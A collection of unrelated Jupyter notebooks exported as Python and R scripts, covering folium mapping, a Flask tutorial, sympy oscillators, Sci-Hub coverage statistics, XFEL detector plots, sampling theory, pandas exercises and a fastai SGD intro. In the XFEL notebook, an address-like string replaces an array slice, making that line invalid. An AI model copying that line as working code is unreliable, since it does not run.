    df['Cluster Labels'] = df['Cluster Labels'].astype('int')
    # create map, centred on the mean coordinates of the data
    latitude = df['Latitude'].mean()
    longitude = df['Longitude'].mean()
    map_clusters = folium.Map(location=[latitude, longitude], zoom_start=11)
# set color scheme for the clusters
x = np.arange(kclusters)
ys = [i + x + (i*x)**2 for i in range(kclusters)]
colors_array = cm.rainbow(np.linspace(0, 1, len(ys)))
rainbow = [colors.rgb2hex(i) for i in colors_array]
markers_colors = []
for index, row in df.iterrows():
postal_code = row['PostalCode']
lat = row['Latitude']
lon = row['Longitude']
neighbour = row['Neighbourhood']
cluster = row['Cluster Labels']
        label = folium.Popup(str(postal_code) + ' ' + str(neighbour) + ' Cluster ' + str(cluster), parse_html=True)
folium.CircleMarker(
[lat, lon],
radius=5,
popup=label,
color=rainbow[cluster-1],
fill=True,
fill_color=rainbow[cluster-1],
            fill_opacity=0.7).add_to(map_clusters)
    return map_clusters
# + pycharm={"name": "#%%\n"}
url = 'https://en.wikipedia.org/wiki/List_of_postal_codes_of_Canada:_M'
toronto_df, toronto_grouped = process_url(url=url)
# + pycharm={"name": "#%%\n"}
toronto_sorted_top_10 = top_10_sorted(toronto_grouped)
# + pycharm={"name": "#%%\n"}
toronto_merged = cluster_and_merge(df=toronto_df, grouped=toronto_grouped,
neighborhoods_venues_sorted=toronto_sorted_top_10)
# + pycharm={"name": "#%%\n"}
plot_clusters(df=toronto_merged, kclusters=5)
|
week4.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # FLASK
# -----------------------
# We will use Python and a library called **Flask** to write our own web server with additional features. Flask is also a **framework**: it establishes a set of conventions for how its libraries are used.
#
# For example, like other libraries, Flask includes functions we can use to parse individual requests, but as a framework it also requires our program's code to be organized in a certain way:
# ## Flask Project Structure
# ```
# flask-project-name
# +--application.py
# +--requirements.txt
# +--static/
# |  +--image1
# |  +--style.css
# |  +--script.js
# +--templates/
# |  +--index.html
# |  +--layout.html
# |  +--page-n.html
# ```
# Where:
#
# - `application.py`: the Python code for our web server.
# - `requirements.txt`: the list of libraries our solution needs in order to work.
# - `static/`: a directory of static files, such as CSS and JavaScript files.
# - `templates/`: a directory of HTML files.
# There are multiple frameworks for every popular language today. Among the popular Python frameworks are Django, Flask, and Pyramid.
# ## The Design Pattern in Flask
# Flask also implements a **design pattern**, that is, a way of organizing our program and code. For Flask, the design pattern is generally MVC, or Model-View-Controller:
#
# <center><img src='./img/flask-mvc.png'></center>
# Where:
#
# - The **controller** is our **logic and code that manages the application overall**, given the user's input. In Flask, this will be our Python code.
#
# - The **view** is the **user interface, such as the HTML and CSS that the user sees and interacts with**.
#
# - The **model** is **our data**, such as a SQL database or a CSV file.
# ## Our First Flask Application
# We can build a simple web application from the following code:
# +
from flask import Flask

app = Flask(__name__)

@app.route("/")
def hello_world():
    return "Hello, Flask!"
# -
# - First, we import `Flask` from the `flask` library, which uses a capital letter for its main class name.
# - Then, we create an application variable, passing our file's name to `Flask`.
# - Next, we attach a function to the `/` route, or URL, with `@app.route`. The `@` symbol in Python is called a decorator, which applies one function to another.
# - We've called the function `hello_world`; it responds to a request for `/`, the default page, and for now it just responds with a string.
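# The `@` decorator syntax is plain Python, not Flask magic. Below is a minimal sketch of the general mechanism a routing decorator relies on; the names are illustrative and this is not Flask's actual implementation:

```python
# Toy route table illustrating the mechanism behind a decorator like @app.route.
# NOT Flask's implementation, just the general decorator pattern.
routes = {}

def route(path):
    def decorator(func):
        routes[path] = func  # register the handler for this URL path
        return func
    return decorator

@route("/")
def hello_world():
    return "Hello, Flask!"

print(routes["/"]())  # prints: Hello, Flask!
```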
# #### Running the Application
# -----------------
#
# To run our script, we can take the following steps in **CMD**:
#
# `> set FLASK_APP=python_file_name`
#
# `> flask run`
# * Running on http://127.0.0.1:5000/
#
#
# We'll update our code to return HTML with the `render_template` function, which finds a given file and returns its contents:
# +
from flask import Flask, render_template

app = Flask(__name__)

@app.route("/")
def index():
    return render_template("index.html")
# -
# We'll need to create a `templates/` directory and add an `index.html` file with some content inside it.
#
# Now, running `flask run` will return that HTML file when we visit our server's URL.
# Next, we'll pass an argument to `render_template` in our controller code:
# +
from flask import Flask, render_template, request

app = Flask(__name__)

@app.route("/")
def index():
    return render_template("index.html", name=request.args.get("name", "world"))
# -
# It turns out we can give `render_template` any argument, such as `name`, and it will substitute it into our template (our HTML file) wherever we put placeholders.
#
# - In `index.html`, we'll replace `hello, world` with `hello, {{ name }}`, to tell Flask where to substitute the `name` variable:
#
#
# ```html
# <!DOCTYPE html>
# <html lang="en">
#     <head>
#         <title>hello</title>
#     </head>
#     <body>
#         hello, {{ name }}
#     </body>
# </html>
# ```
# - We can use the `request` variable from the Flask library to get a parameter from the HTTP request (here, `name` again), falling back to a default value of `world` if one wasn't provided.
# - Now, when we restart our server after making these changes and visit the default page with a URL like `/?name=David`, we'll see that same input returned in the HTML our server generates.
#
#
# We can assume that a Google search query, as in `/search?q=cats`, is likewise parsed by some code for the `q` parameter and passed to some database to fetch all the relevant results. Those results are then used to generate the final HTML page.
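# We can see what that parsing looks like with Python's standard library; here is a small sketch using `urllib.parse`, where the URL is only an example:

```python
from urllib.parse import urlparse, parse_qs

# Break an example search URL into its components.
url = "https://www.google.com/search?q=cats"
parts = urlparse(url)
print(parts.path)             # prints: /search
print(parse_qs(parts.query))  # prints: {'q': ['cats']}
```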
# ## Forms
# We'll move our original template to `greet.html`, so that it greets the user by name. In `index.html`, we'll create a form:
#
# ```html
# <!DOCTYPE html>
# <html lang="en">
#     <head>
#         <title>hello</title>
#     </head>
#     <body>
#         <form action="/greet" method="get">
#             <input name="name" type="text">
#             <input type="submit">
#         </form>
#     </body>
# </html>
# ```
# - We submit the form to the `/greet` route, with one input for the `name` parameter and another for the submit button.
# - In our `application.py` controller, we'll also need to add a function for the `/greet` route, which is almost exactly what we had for `/` before:
# +
@app.route("/")
def index():
    return render_template("index.html")

@app.route("/greet")
def greet():
    return render_template("greet.html", name=request.args.get("name", "world"))
# -
# - Our form in `index.html` can be static, since it's the same every time.
#
# Now we can run our server, see our form on the default page, and use it to generate another page.
# ## Post
# - Our form above used the GET method, which includes the form's data in the URL.
# - Let's change the method in our HTML: `<form action="/greet" method="post">`. Our controller will also need to change, to accept the POST method and look for the parameter elsewhere:
@app.route("/greet", methods=["POST"])
def greet():
    return render_template("greet.html", name=request.form.get("name", "world"))
# - While `request.args` holds the parameters of a GET request, in Flask we have to use `request.form` for the parameters of a POST request.
#
#
# Now, when we restart our application after making these changes, we can see that the form takes us to `/greet`, but its contents are no longer included in the URL.
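# A standard-library sketch of the difference (no server required): with GET the form data is appended to the URL as a query string, while with POST the same encoded data travels in the request body and the URL stays clean. The values below are illustrative.

```python
from urllib.parse import urlencode

form_data = {"name": "David"}
encoded = urlencode(form_data)  # 'name=David'

# GET: the data rides along in the URL.
get_url = "/greet?" + encoded
print(get_url)  # prints: /greet?name=David

# POST: the URL stays '/greet'; the same bytes go in the request body instead.
post_url = "/greet"
post_body = encoded.encode("ascii")
print(post_url, post_body)  # prints: /greet b'name=David'
```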
# ## Layouts
# - In `index.html` and `greet.html`, we have repeated HTML. With HTML alone we can't share code between files, but with Flask's templates (and other web frameworks) we can factor that common content out.
# - We'll create another template, `layout.html`:
# ```html
# <!DOCTYPE html>
# <html lang="en">
#     <head>
#         <title>hello</title>
#     </head>
#     <body>
#         {% block body %}{% endblock %}
#     </body>
# </html>
# ```
# Flask supports Jinja, a templating language that uses the `{% %}` syntax to include blocks of placeholders or other snippets of code. Here we've named our block `body`, since it contains the HTML that should go inside the `<body>` element.
# Likewise, in `greet.html`, we define the `body` block with just the greeting:
#
# ```html
# {% extends "layout.html" %}
#
# {% block body %}
#     hello, {{ name }}
# {% endblock %}
# ```
# Now, if we restart our server, open our server's URL, and view the page's HTML source, we see a complete page with our form inside it, generated by Flask.
#
# We can even reuse the same route to support both the GET and POST methods:
@app.route("/", methods=["GET", "POST"])
def index():
    if request.method == "POST":
        return render_template("greet.html", name=request.form.get("name", "world"))
    return render_template("index.html")
# - First, we check whether the `method` of the `request` is POST. If so, we look for the `name` parameter and return HTML from the `greet.html` template. Otherwise, we return HTML from `index.html`, which has our form.
# - We'll also need to change the form's `action` to the default `/` route.
# # REFERENCES
# ----------------
# - Official [Flask](https://flask.palletsprojects.com/en/2.0.x/quickstart/) documentation
# - Official [Jinja](https://jinja.palletsprojects.com/en/3.0.x/) documentation
#
# - CS50 [Flask video](https://cs50.harvard.edu/x/2021/weeks/9/)
|
Modulo5/4.Flask.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from sympy import *
init_printing()
k, m, w0, w = symbols(r'k,m,\omega_0,\omega')
m1, m2 = symbols('m_1,m_2')
# +
W = w0**2*Matrix([[2,-1,0,0],[-1,2,-1,0],[0,-1,2,-1],[0,0,-1,2]])
display(W)
w0=1
# -
solve(det(W - w**2*eye(4)),w**2)
W.eigenvals()
evecs = W.eigenvects()
for i in range(0, len(evecs)):
    display(simplify(evecs[i][2][0]))
m2 = Matrix([[2*k/m1, k/m1],[k/m2,-k/m2]])
evecs2 = m2.eigenvects()
for i in range(0, len(evecs2)):
    display(simplify(evecs2[i][2][0]))
|
teaching/PHY1110/DS/Code/.ipynb_checkpoints/DS10 - Four Masses and Five Springs-checkpoint.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .r
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: R [conda env:scihub]
# language: R
# name: conda-env-scihub-r
# ---
# # Associations between Journal Prestige and Sci-Hub Coverage
# Load magrittr pipe
`%>%` = dplyr::`%>%`
# ## Read data
# +
config = '00.configuration.json' %>% jsonlite::read_json()
scopus_col_types = list(
    scopus_id = readr::col_character(),  # R fails with big integers like 2200147401
    open_access = readr::col_logical(),
    active = readr::col_logical()
)
# -
# Read scopus journal metrics
metrics_df = paste0(config$scopus_url, 'data/metrics.tsv.gz') %>%
    readr::read_tsv(col_types = scopus_col_types)
head(metrics_df, 2)
# +
journal_df = file.path('data', 'journal-coverage.tsv') %>%
    readr::read_tsv(col_types = scopus_col_types)
head(journal_df, 2)
# -
# ## Distribution of Sci-Hub journal coverage
#
# Can be removed, since now performed in 6.visualize-coverage.
# +
# Set figure dimensions
width = 7
height = 2
options(repr.plot.width=width, repr.plot.height=height)
journal_df %>%
    ggplot2::ggplot(ggplot2::aes(x = coverage, fill = open_access)) +
    ggplot2::geom_histogram(binwidth = 0.01) +
    ggplot2::scale_x_continuous(labels = scales::percent, name=NULL, expand = c(0, 0)) +
    ggplot2::scale_y_continuous(name=NULL, expand = c(0, 0)) +
    ggplot2::scale_fill_manual(name = NULL, values = c(`TRUE`='#F68212', `FALSE`='#000000')) +
    ggplot2::theme_bw()
# -
# ## Coverage versus citation metrics
# +
citescore_2015_df = metrics_df %>%
    dplyr::filter(year == 2015) %>%
    dplyr::filter(metric == 'CiteScore') %>%
    dplyr::transmute(scopus_id, citescore_2015 = value) %>%
    dplyr::inner_join(journal_df)
nrow(citescore_2015_df)
head(citescore_2015_df, 2)
# -
# ### Sci-Hub Coverage versus CiteScore Decile
# +
quantiles = quantile(citescore_2015_df$citescore_2015, probs = seq(0, 1, 0.1))
citescore_coverage_df = citescore_2015_df %>%
    dplyr::mutate(citescore_2015_decile = as.factor(dplyr::ntile(citescore_2015, 10))) %>%
    dplyr::group_by(citescore_2015_decile) %>%
    dplyr::summarize(
        mean_coverage = mean(coverage),
        sd_coverage = sd(coverage),
        coverage_ci_lower = Hmisc::smean.cl.normal(coverage, conf.int = 0.99)['Lower'],
        coverage_ci_upper = Hmisc::smean.cl.normal(coverage, conf.int = 0.99)['Upper'],
        journals = n()
    ) %>%
    dplyr::mutate(citescore_lower = quantiles[1:10]) %>%
    dplyr::mutate(citescore_upper = quantiles[2:11]) %>%
    dplyr::mutate(label = sprintf("%.2f–%.3g", citescore_lower, citescore_upper))
citescore_coverage_df
# +
# Set figure dimensions
width = 3
height = 2.5
options(repr.plot.width=width, repr.plot.height=height)
gg = citescore_coverage_df %>%
    ggplot2::ggplot(ggplot2::aes(x = citescore_2015_decile, y = mean_coverage)) +
    ggplot2::geom_col(alpha=1, color='white', fill='#efdada') +
    ggplot2::geom_linerange(ggplot2::aes(ymin = coverage_ci_lower, ymax = coverage_ci_upper), color='#990000') +
    ggplot2::scale_x_discrete(name='CiteScore Decile', expand=c(0.015, 0), labels = citescore_coverage_df$label) +
    ggplot2::scale_y_continuous(labels = scales::percent, name='Sci-Hub Coverage', breaks = seq(0, 1, 0.2), expand=c(0, 0)) +
    ggplot2::expand_limits(y=1) +
    ggplot2::theme_bw() +
    ggplot2::theme(
        axis.text.x = ggplot2::element_text(angle=37, hjust=1, vjust=1),
        panel.grid.major.x = ggplot2::element_blank()
    )
file.path('figure', 'coverage-versus-citescore-decile.svg') %>%
ggplot2::ggsave(plot = gg, width = width, height = height)
saveRDS(gg, file.path('figure', 'coverage-versus-citescore-decile.rds'))
gg
# -
# ### CiteScore versus Sci-Hub Coverage
# +
# Set figure dimensions
width = 3
height = 2
options(repr.plot.width=width, repr.plot.height=height)
citescore_2015_df %>%
    dplyr::mutate(citescore_2015_log1p = log1p(citescore_2015)) %>%
    ggplot2::ggplot(ggplot2::aes(x = coverage, y = citescore_2015_log1p)) +
    ggplot2::stat_summary_bin(binwidth=0.05, fun.data = 'mean_cl_normal', right=TRUE, geom='bar', alpha=0.5, color='white') +
    ggplot2::stat_summary_bin(binwidth=0.05, fun.data = 'mean_cl_normal', right=TRUE, geom='linerange') +
    ggplot2::scale_x_continuous(labels = scales::percent, name='Sci-Hub Coverage', breaks = seq(0, 1, 0.2), expand=c(0.01, 0)) +
    ggplot2::scale_y_continuous(name='Log CiteScore', expand=c(0, 0)) +
    ggplot2::expand_limits(y=0.95) +
    ggplot2::theme_bw()
# -
# ### Sci-Hub Coverage versus Journal Metrics
# +
# Set figure dimensions
width = 7
height = 8
options(repr.plot.width=width, repr.plot.height=height)
breaks = round(exp(seq(0, 4.5, 0.7)) - 1)
metrics_df %>%
    dplyr::inner_join(journal_df) %>%
    ggplot2::ggplot(ggplot2::aes(x = value, y = coverage)) +
    ggplot2::geom_hex() +
    ggplot2::scale_fill_continuous(trans = 'log10') +
    ggplot2::facet_grid(year ~ metric, scales = 'free_x') +
    ggplot2::scale_x_continuous(trans='log1p', breaks=breaks) +
    ggplot2::scale_y_continuous(labels = scales::percent) +
    ggplot2::theme_bw()
|
07.journal-prestige.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: xfel
# language: python
# name: xfel
# ---
import numpy as np
import h5py
from pathlib import Path
from extra_geom import AGIPD_1MGeometry
from cxiapi import cxiData
import matplotlib.pyplot as plt
from p_tqdm import p_umap, p_map
from functools import partial
import multiprocessing as mp
# Experiment run number.
run = 364
# Hitfinding on which module.
module = 15
# Number of CPU processes to use, '0' means using all.
nproc = 0
# The folder of cxi files
cxi_folder = '/gpfs/exfel/u/scratch/SPB/202130/p900201/spi-comission/vds/'
# Cheetah files folder for calibration
calib_folder = '/gpfs/exfel/exp/SPB/202130/p900201/usr/Software/calib/r0361-r0362-r0363/'
# Geometry file for the detector
geom_file = '/gpfs/exfel/exp/SPB/202130/p900201/usr/Software/geom/agipd_2696_v5.geom'
# +
cxi_path = Path(cxi_folder, f'r{run:04}.cxi')
fn = str(cxi_path)
cxi = cxiData(fn, verbose=1, debug=0)
pulse = np.arange(0, 352)
base_pulse_filter = np.ones(600, dtype="bool")
base_pulse_filter[len(pulse):] = False
base_pulse_filter[0] = False
base_pulse_filter[fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b] = False
base_pulse_filter[29::32] = False
good_cells = pulse[base_pulse_filter[:len(pulse)]]
cxi.setGoodCells(good_cells)
cxi.setCalib(calib_folder)
cxi.setGeom(geom_file)
# -
# ## Fast plot
cxi.fastPlotCalibDetector(300)
cxi.setADU_per_photon(45)
cxi.plot(300, ADU=False)
ROI = ((500,800), (430,700))
cxi.plot(300, ROI_value=ROI, ADU=False)
# ## Modules
# plt.colorbar()
ROI = ((512-50,None), (None,51))
cxi.cleanModuleMasks()
cxi.plot(300,15, ADU=False, transpose=True)
cxi.plot(300,15, ROI_value = ROI, ADU=False, transpose=True)
# ### Plot in ADU
cxi.plot(300,15, ROI_value = ROI, ADU=True, transpose=True)
# ## Mask to clean up
mask = np.ones((512,128))
mask[470:473,15:18] = 0
cxi.setModuleMasks(15,mask)
ROI = ((512-50,None), (None,51))
cxi.plot(300,15, ROI_value = ROI, ADU=False, transpose=True)
cxi.cleanModuleMasks()
# ### Adjust plot kwargs
cxi.plot(300,15, ROI_value = ROI, ADU=False, transpose=True, module_mask=mask, vmax=5)
ROI = ((500,800), (430,700))
cxi.plot(300, ROI_value=ROI, ADU=False)
# ## Fixed gain
cxi.plot(300, ROI_value=ROI, ADU=True, vmax=90)
cxi.setGainMode(0)
cxi.plot(300, ROI_value=ROI, ADU=True, vmax=90)
cxi.setGainMode(None)
|
examples/newCXI.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [Root]
# language: python
# name: Python [Root]
# ---
# HIDDEN
from datascience import *
from prob140 import *
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('fivethirtyeight')
# %matplotlib inline
from scipy import stats
# ## Finite Population Correction ##
# Data scientists often have to work with a relatively small sample from an enormous population. So suppose we are drawing at random $n$ times from a population of size $N$ where $N$ is large and $n$ is small relative to $N$. Just go with the flow for now – all of this will become more precise as this section develops.
#
# Suppose the population mean is $\mu$ and the population SD is $\sigma$. Let $S_n$ be the sample sum. Then, regardless of whether the sample is drawn with replacement or without,
# $$
# E(S_n) = n\mu
# $$
#
# The variance of the sample sum is different in the two cases.
#
# |$~~~~~~~~~~~~~~~~~$ | sampling with replacement | sampling without replacement|
# |:---------:|:-------------------------:|:---------------------------:|
# |$Var(S_n)$ |$n\sigma^2$ | $n\sigma^2\frac{N-n}{N-1}$ |
# |$SD(S_n)$ |$\sqrt{n}\sigma$ | $\sqrt{n}\sigma\sqrt{\frac{N-n}{N-1}}$ |
# The "without replacement" column is the same as the "with replacement" column apart from what are called *correction factors*. The one for the SD is called the *finite population correction* or fpc.
#
# $$
# \text{finite population correction} ~ = ~ \sqrt{\frac{N-n}{N-1}}
# $$
#
# The name arises because sampling with replacement can be thought of as sampling without replacement from an infinite population. Every time you draw, you leave the proportions in the population exactly the same as they were before you drew.
#
# A more realistic version of that image is drawing without replacement from an enormous finite population. Every time you draw, you leave the proportions in the population *almost* exactly the same as they were before you drew.
#
# We used this idea earlier when we said that sampling without replacement is almost the same as sampling with replacement provided you are drawing a relatively small sample from a very large population.
#
# The fpc gives us a way to quantify this idea.
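# As a quick numeric check (the sizes here are chosen only for illustration), a 1% sample from a population of 10,000 has an fpc very close to 1:

```python
# fpc for N = 10,000 and n = 100 (a 1% sample); the sizes are illustrative.
N = 10_000
n = 100
fpc_value = ((N - n) / (N - 1)) ** 0.5
print(round(fpc_value, 6))  # prints: 0.995037
```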
# ### The Size of the FPC ###
# First note that when $N$ is even moderately large,
# $$
# \frac{N-n}{N-1} ~ \approx ~ \frac{N-n}{N} ~ = ~ 1 - \frac{n}{N}
# $$
#
# which is the fraction of the population that is left after sampling.
#
# If $N$ is large and $n$ is small relative to $N$, then
#
# $$
# \frac{N-n}{N-1} ~ \approx ~ 1 - \frac{n}{N} ~ \approx ~ 1
# $$
# which also implies
# $$
# \sqrt{\frac{N-n}{N-1}} ~ \approx ~ 1
# $$
#
# So whether you are sampling with replacement or without, the variance of the sample sum can be taken to be $n\sigma^2$. The formula is exact in the case of sampling with replacement and an excellent approximation in the case of sampling without replacement from a large population when the sample size is small relative to the population size.
#
# The table below gives the fpc for a variety of population and sample sizes.
# +
pop = make_array(1000, 10000, 50000, 100000, 500000, 1000000)
def fpc(pct):
    samp = np.round(pop*pct/100, 0)
    return np.round(((pop-samp)/(pop-1))**0.5, 6)
# -
Table().with_columns(
    'Population Size', pop,
    '1% Sample', fpc(1),
    '5% Sample', fpc(5),
    '10% Sample', fpc(10),
    '20% Sample', fpc(20)
)
# The values in each column are essentially constant, because each is essentially the square root of the fraction *not* sampled:
# +
sample_pct = make_array(1, 5, 10, 20)
(1 - sample_pct/100)**0.5
# -
# All of these fpc values are fairly close to 1, especially in the 1% column where they are all essentially 0.995. That is why the fpc is often dropped from variance calculations.
# ### The (Non) Effect of the Population Size ###
# The SD of a simple random sample sum depends only on the sample size and the population SD, provided the population size is large enough that the fpc is close to 1.
#
# That's clear from the formula. If the fpc is close to 1, as it often is, then
#
# $$
# SD(S_n) \approx \sqrt{n}\sigma
# $$
#
# which involves only the sample size $n$ and the population SD $\sigma$.
#
# To understand this intuitively, suppose you are trying to determine the composition of a liquid based on the amount in a test tube. If the liquid is well mixed, does it matter whether the amount in the test tube was drawn from a bowl or from a bathtub? It doesn't, because both the bowl and the bathtub are so much larger than the test tube that they might as well be infinite.
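# A small simulation, using only the standard library and arbitrarily chosen sizes, illustrates the point: the empirical SD of the sample sum is close to $\sqrt{n}\sigma$ whether the test tube is drawn from the bowl or the bathtub.

```python
import random
import statistics

random.seed(0)

def sd_of_sample_sums(population, n, reps=2000):
    # Empirical SD of the sum of n draws made without replacement.
    sums = [sum(random.sample(population, n)) for _ in range(reps)]
    return statistics.pstdev(sums)

n = 25  # "test tube" size
bowl = [random.gauss(0, 1) for _ in range(1_000)]       # smallish population
bathtub = [random.gauss(0, 1) for _ in range(100_000)]  # enormous population

# Both are close to sqrt(25) * 1 = 5.
print(sd_of_sample_sums(bowl, n))
print(sd_of_sample_sums(bathtub, n))
```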
|
content/Chapter_13/04_Finite_Population_Correction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # MPG Cars
# ### Introduction:
#
# The following exercise utilizes data from [UC Irvine Machine Learning Repository](https://archive.ics.uci.edu/ml/datasets/Auto+MPG)
#
# ### Step 1. Import the necessary libraries
# + jupyter={"outputs_hidden": false}
import pandas as pd
import numpy as np
# -
# ### Step 2. Import the first dataset [cars1](https://raw.githubusercontent.com/guipsamora/pandas_exercises/master/05_Merge/Auto_MPG/cars1.csv) and [cars2](https://raw.githubusercontent.com/guipsamora/pandas_exercises/master/05_Merge/Auto_MPG/cars2.csv).
# ### Step 3. Assign each to a variable called cars1 and cars2
# + jupyter={"outputs_hidden": false}
url1 = 'https://raw.githubusercontent.com/guipsamora/pandas_exercises/master/05_Merge/Auto_MPG/cars1.csv'
url2 = 'https://raw.githubusercontent.com/guipsamora/pandas_exercises/master/05_Merge/Auto_MPG/cars2.csv'
df = pd.read_csv(url1, sep=',')
df2 = pd.read_csv(url2, sep=',')
# -
df.head(3)
df2.head(3)
# ### Step 4. Oops, it seems our first dataset has some unnamed blank columns, fix cars1
df = df.iloc[:, 0:9]
df.head(3)
# ### Step 5. What is the number of observations in each dataset?
# + jupyter={"outputs_hidden": false}
df.info()
# -
df2.info()
# ### Step 6. Join cars1 and cars2 into a single DataFrame called cars
# + jupyter={"outputs_hidden": false}
coches = pd.concat([df, df2])  # DataFrame.append is deprecated in newer pandas; concat stacks the rows
coches
# -
# ### Step 7. Oops, there is a column missing, called owners. Create a random number Series from 15,000 to 73,000.
# + jupyter={"outputs_hidden": false}
coches['owners'] = np.random.randint(15000, 73000, coches.shape[0])
# -
coches.head(2)
# ### Step 8. Add the column owners to cars
# + jupyter={"outputs_hidden": false}
|
05_Merge/Auto_MPG/Exercises.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# **File name**: dispersion_values.ipynb<br>
# **Authors**: <NAME> <[<EMAIL>](mailto:<EMAIL>)>, <NAME> <[<EMAIL>](mailto:<EMAIL>)>
#
# This file is part of REDE project (https://github.com/akarazeev/REDE)
#
# **Description**: ...
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import interpolate
import os
import tqdm
import pickle
import scipy.io as spio
# +
# %load_ext autoreload
# %autoreload 2
from prepare_dataset_keras import preproc
# -
def df_by_filepath(filepath):
    # Load data.
    mat = spio.loadmat(filepath, squeeze_me=True)
    struct = mat['str']
    header = ['id']
    header.extend(struct[0][1].dtype.names)
    # Create DataFrame.
    dataset = []
    for i in range(len(struct)):
        tmp = [int(struct[i][0])]
        tmp.extend([float(struct[i][1][name]) for name in header[1:]])
        dataset.append(tmp)
    df_data = pd.DataFrame(data=dataset, columns=header)
    return df_data, struct
df_data, struct = df_by_filepath('matlab_data/set_1848_elements.mat')
df_data.head()
# +
# Generate dataset.
frequencies_modes_list = []
parameters_list = []
dispersions = []
for filepath in ['matlab_data/set_1848_elements.mat']:
    df_data, struct = df_by_filepath(filepath)
    for i in tqdm.tqdm(range(len(struct))):
        # Parameters.
        sample_id = int(struct[i][0])
        parameters = df_data[df_data['id'] == sample_id].values[0][1:]
        parameters_list.append(parameters)
        # Frequencies and modes.
        freqs, modes = struct[i][2][:, 0].real, struct[i][2][:, 2].real
        frequencies_modes_list.append((freqs, modes))
        # Dispersions.
        omega_total, delta_omega_total, D1_total, D2_total = preproc(freqs, modes)
        x = omega_total * 1e-12
        y = delta_omega_total * 1e-9
        dispersions.append((x, y))
# -
[len(x[0]) for x in dispersions[:10]]
# +
x, y = dispersions[1000]
plt.figure(figsize=(10,5))
plt.scatter(x[::300], y[::300]) # Plot each 300 data point.
plt.xlabel("Frequency (THz)")
plt.ylabel("Mode deviation (GHz)")
plt.title("Modal spectral deviation in SiN resonator")
plt.show()
# -
# Parameters for 1000th simulation.
parameters_list[1000]
x[:10]
y[:10]
|
utils/dispersion_values_keras.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: base [py3]
# language: python
# name: python3
# ---
import argparse
from os.path import expanduser
def _make_base_parser():
    """Configure the base parser that the other subcommands will inherit from

    Returns
    -------
    ArgumentParser
    """
    main_parser = argparse.ArgumentParser(
        prog='livy-submit',
        description="CLI for interacting with the Livy REST API",
    )
    main_parser.add_argument(
        '--conf-file',
        action='store',
        default=expanduser('~/.livy-submit'),
        help="The location of the livy submit configuration file"
    )
    subparser = main_parser.add_subparsers(
        title='Livy CLI subcommands',
    )
    return main_parser, subparser
# +
def run_endpoint_info(args):
    print(args)
def _make_livy_info_parser(base_parser):
    """Configure the `livy info` subparser

    Parameters
    ----------
    base_parser

    Returns
    -------
    ArgumentParser
    """
    livy_info_parser = base_parser.add_parser('info')
    livy_info_parser.add_argument(
        '--short',
        action='store_true',
        default=False,
        help="Only show the current status of the job"
    )
    livy_info_parser.add_argument(
        'batchId',
        action='store',
        # required=False,
        help="The Livy batch ID for which you want information"
    )
    livy_info_parser.set_defaults(func=run_endpoint_info)
    return livy_info_parser
# -
def make_parser():
    main_parser, subparser = _make_base_parser()
    _make_livy_info_parser(subparser)
    return main_parser, subparser
main_parser, subparser = make_parser()
args = main_parser.parse_args(['info', '123', '--short'])
args.func(args)
# ## Expected user input for `livy info`
# `$ livy info`
#
# `$ livy info --short`
#
# `$ livy info 123`
#
# `$ livy info 123 --short`
#
#
def validate_parser():
    main_parser, subparser = make_parser()
    livy_info_parser = subparser.add_parser('info')
    main_parser.parse_args(['--help'])
    main_parser.parse_args(['info', '--help'])
|
dev-notebooks/parser.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/jsqihui/ai/blob/master/_notebooks/2020_12_16_SGD_1.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="Rz7zuSy1Skpc"
# # SGD Experiment 1
# > SGD and the basic steps of ML
#
# - toc: true
# - branch: master
# - badges: true
# - comments: true
# - author: jsqihui
# - categories: [fast.ai]
#
#
# + id="GBpqe_FH6Zof" colab={"base_uri": "https://localhost:8080/"} outputId="db0ac6a1-529f-4d39-a298-cbda69485c47"
#hide
# !pip install -Uqq fastbook
import fastbook
fastbook.setup_book()
from fastai.vision.all import *
from fastbook import *
matplotlib.rc('image', cmap='Greys')
# + [markdown] id="UxwrbA8k8Ddm"
# Suppose our problem is to infer a model of a roller coaster's speed, given data for its speed at every time point from 0 to 20.
# + colab={"base_uri": "https://localhost:8080/", "height": 265} id="ZpmjkPDW7Upx" outputId="e635ba3c-40f5-4609-9fce-7935aa0a5373"
time = torch.arange(0,20).float()
speed = torch.randn(20)*3 + 0.75*(time-9.5)**2 + 1
plt.scatter(time,speed);
# + [markdown] id="ECZHLyzn9OXA"
# We guess that the architecture might be a second-degree polynomial; we then need to determine its parameters.
# + id="QGROL6d06Zph"
def f(t, params):
    a, b, c = params
    return a*(t**2) + (b*t) + c
# + [markdown] id="7qBac_A99qpu"
